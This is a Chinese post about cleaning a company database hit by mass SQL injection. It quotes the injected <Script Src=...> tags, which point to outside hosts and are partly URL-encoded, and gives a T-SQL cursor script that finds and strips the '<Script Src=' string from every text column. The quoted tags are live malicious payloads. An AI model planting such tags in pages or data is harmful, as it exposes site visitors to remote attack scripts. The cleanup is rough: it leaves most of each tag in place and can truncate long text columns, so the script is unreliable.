数据库注入js脚本
最近公司总是 被攻击,数据库中的很多表被注入了js 脚本,比如
"<Script Src=http://c.nuclear3.c%6F%6D/css/c.js></Script><Script Src=http://c.%6Euclear3.com/css/c.js></Script><script src=http://cn.daxia123.cn/cn.js>",等等类似
于是写了一个替换语句来替换掉那些脚本,主要就是把脚本替换为空格,使用这条语句只要在下面这个地方,将你要查找并替换的关键换掉就可以了,
--要替换的文字
set @mySqlForReplaceSrc='<Script Src='
如果你不想替换为空格,那么在 +@quto+@quto+ 之间 加入你要替换的文本就可以了
Deallocate Table_Cursor
go
Declare @T Varchar(255),@C Varchar(255) ,@cnt int
Declare @mySqlForCount nvarchar(3000),@mySqlForSelect nvarchar(3000),@mySqlForReplace nvarchar(3000),@mySqlForReplaceText nvarchar(3000),@num int
Declare @mySqlForWhere nvarchar(500),@mySqlForReplaceSrc nvarchar(500)
Declare @quto nvarchar(500)
set @cnt = 0
Declare Table_Cursor Cursor For
Select A.Name,B.Name From Sysobjects A,Syscolumns B
Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167)
Open Table_Cursor
Fetch Next From Table_Cursor Into @T,@C
While(@@Fetch_Status=0)
Begin
--要替换的文字
set @mySqlForReplaceSrc='<Script Src='
--where条件
set @mySqlForWhere='where ['+@C+'] like ''%'+@mySqlForReplaceSrc + '%'''
--这里主要是为了转义‘ 单引号
set @quto=''''
set @mySqlForSelect='select '+@C+' from ['+@T+'] '+@mySqlForWhere
set @mySqlForReplace='update '+@T+' set ['+@C+']= replace(['+@C+'],'+@quto+@mySqlForReplaceSrc+@quto+','+@quto+@quto+') ' +@mySqlForWhere
set @mySqlForReplaceText='update '+@T+' set ['+@C+']= replace(Cast(['+@C+'] as varchar(8000)),'+@quto+@mySqlForReplaceSrc+@quto+','+@quto+@quto+') ' +@mySqlForWhere
set @mySqlForCount='select @a=count(*) from ['+@T+'] '+@mySqlForWhere
exec sp_executesql @mySqlForCount,N'@a int output',@num output
if @num>0
begin
--print @mysqlForReplace
--查询
exec (@mysqlForSelect)
--替换语句
--exec (@mysqlForReplace)
--exec (@mysqlForReplaceText)
end
set @cnt = @cnt+1
Fetch Next From Table_Cursor Into @T,@C
End
Close Table_Cursor
print @cnt
Deallocate Table_Cursor